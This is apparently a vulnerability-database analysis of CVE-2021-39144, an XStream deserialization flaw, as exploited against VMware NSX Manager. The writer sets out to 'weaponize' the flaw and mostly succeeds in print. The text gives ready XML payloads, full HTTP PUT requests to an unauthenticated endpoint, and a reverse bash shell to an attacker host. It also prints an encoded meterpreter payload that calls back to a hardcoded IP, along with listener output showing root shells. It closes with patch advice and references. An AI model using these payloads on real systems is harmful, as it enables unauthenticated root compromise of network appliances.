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XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream’s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
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Attacker ValueVery High
ExploitabilityVery High
Technical Analysis
On the 25th October 2022, security researcher Sina Kheirkhah and Steven Seeley from Source Incite discovered a remote code execution in VMware NSX Manager (NSX-V) that exploits the XStream vulnerability that was identified in August 2021.
There is an excellent writeup that can be found here: Eat What You Kill which explains this technical details of this remote code execution.
Please read the article first because I will not repeat all the good things explained in the article, but focus more on how to weaponize this exploit.
In a nut shell, XStream is a set of concise and easy-to-use open-source class libraries for marshalling Java objects into XML or unmarshalling XML into Java objects. It is a two-way converter between Java objects and XML.
In XStream <= 1.4.18
there is a de-serialization of untrusted data and is tracked as CVE-2021-39144. VMWare NSX Manager (NSX-V) uses the package xstream-1.4.18.jar
so it is vulnerable to this de-serialization vulnerability.
But this is not the only part.
To make this work Dynamic Proxies
are used.
Dynamic proxy
is a design pattern in Java which provides a proxy for a certain object, and the proxy object controls the access to the real object. These proxies are fronts or wrappers that pass function invocation through their own facilities (onto real methods) and this is being used to trigger the execution.
And the final piece is to identify an endpoint that is reachable from an unauthenticated context, where an attacker can send a specially crafted XStream marshalled payload with the dynamic proxy and trigger remote code execution in the context of root!
This unauthenticated endpoint can be found in /home/secureall/secureall/sem/WEB-INF/spring/security-config.xml
configuration and is pre-authenticated due to the use of isAnonymous
<http auto-config="false" use-expressions="true" entry-point-ref="authenticationEntryPoint" create-session="stateless"> <csrf disabled="true" /> <!-- ... --> <intercept-url pattern="/api/2.0/services/usermgmt/password/**" access="isAnonymous()" /> <intercept-url pattern="/api/2.0/services/usermgmt/passwordhint/**" access="isAnonymous()" /> <!-- ... --> <custom-filter position="BASIC_AUTH_FILTER" ref="basicSSOAuthNFilter"/> <custom-filter position="PRE_AUTH_FILTER" ref="preAuthFilter"/> <custom-filter after="SECURITY_CONTEXT_FILTER" ref="jwtAuthFilter"/> <custom-filter before="BASIC_AUTH_FILTER" ref="unamePasswordAuthFilter"/> </http>
So far, so good, but how do we weaponize this to achieve the remote code execution?
At first, take this XML example below to craft your malicious XML payload.
<sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>PUT YOUR PAYLOAD HERE</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>
Let’s take a reverse bash shell payload example: bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
and send this with burpsuite
to the pre-authenticated endpoint of a vulnerable VMware NSX Manager. The pre-authenticated endpoint will work with any randomized string /api/2.0/services/usermgmt/password/<random string>
Note: please use HTML encoding for your payload inside the XML, otherwise it will NOT work.
Burp Request
PUT /api/2.0/services/usermgmt/password/blablabla HTTP/1.1 Host: Content-Type: application/xml Content-Length: 587 <sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>bash</string> <string>-c</string> <string>bash -i >& /dev/tcp/ 0>&1</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>
Start a Netcat listener on attacker host and send the burp request to the vulnerable endpoint.
You will get a bash
shell on your attacker machine.
# nc -lnvp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 46488 bash: cannot set terminal process group (5722): Inappropriate ioctl for device bash: no job control in this shell bash-5.0# uname -a uname -a Linux manager 4.9.297 #1 SMP Tue Feb 1 08:50:25 GMT 2022 x86_64 GNU/Linux bash-5.0# whoami whoami root bash-5.0#
Let’s take another example where we launch a meterpreter session using Metasploit
First create a python meterpreter payload using mfsvenom
# msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw [-] No platform was selected, choosing Msf::Module::Platform::Python from the payload [-] No arch selected, selecting arch: python from the payload No encoder specified, outputting raw payload Payload size: 497 bytes exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMTAwLjcnLDQ0NDQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=')[0]))
Encode this payload with an HTML encoder. There are a lot of good HTML encoders online that you can use –> Online HTML encoder
And construct the XML payload below with burpsuite
PUT /api/2.0/services/usermgmt/password/cuckoo HTTP/1.1 Host: Content-Type: application/xml Content-Length: 1055 <sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>python</string> <string>-c</string> <string>exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMTAwLjcnLDQ0NDQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=')[0]))</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>
Start up a python meterpreter listener in Metasploit
using the multi/handler
msf6 > use multi/handler [*] Using configured payload python/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (python/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > exploit -j -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on
Send the burp request and wait for meterpreter session to come in.
msf6 exploit(multi/handler) > [*] Sending stage (40164 bytes) to [*] Sending stage (40168 bytes) to [*] Meterpreter session 5 opened ( -> at 2022-11-06 06:47:59 +0000 msf6 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 5 meterpreter python/linux root @ manager -> ( msf6 exploit(multi/handler) > sessions -i 5 [*] Starting interaction with 5... meterpreter > sysinfo Computer : manager OS : Linux 4.9.297 #1 SMP Tue Feb 1 08:50:25 GMT 2022 Architecture : x64 System Language : en_US Meterpreter : python/linux meterpreter > getuid Server username: root meterpreter >
The examples above show that it is pretty simple to weaponize and therefore there is a high probability of exploitation in the wild.
VMware Cloud Foundation 3.x
and more specific NSX Manager Data Center for vSphere
up to and including version 6.4.13
are vulnerable to Remote Command Injection using XStream.
I have created a Metasploit module that has been submitted to the mainstream for production. A local version of this module can found at the Reference section.
Please update VMware NSX Manager
to 6.4.14
and follow the instructions in VMware Knowledge Base article listed in the Reference section.
Eat What You Kill::Pre-authenticated Remote Code Execution in VMWare NSX Manager
VMware advisory
VMware KB
Metasploit Development h00die-gr3y
Credits goes to the security researchers below who discovered these vulnerabilities.
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Great analysis, thank you!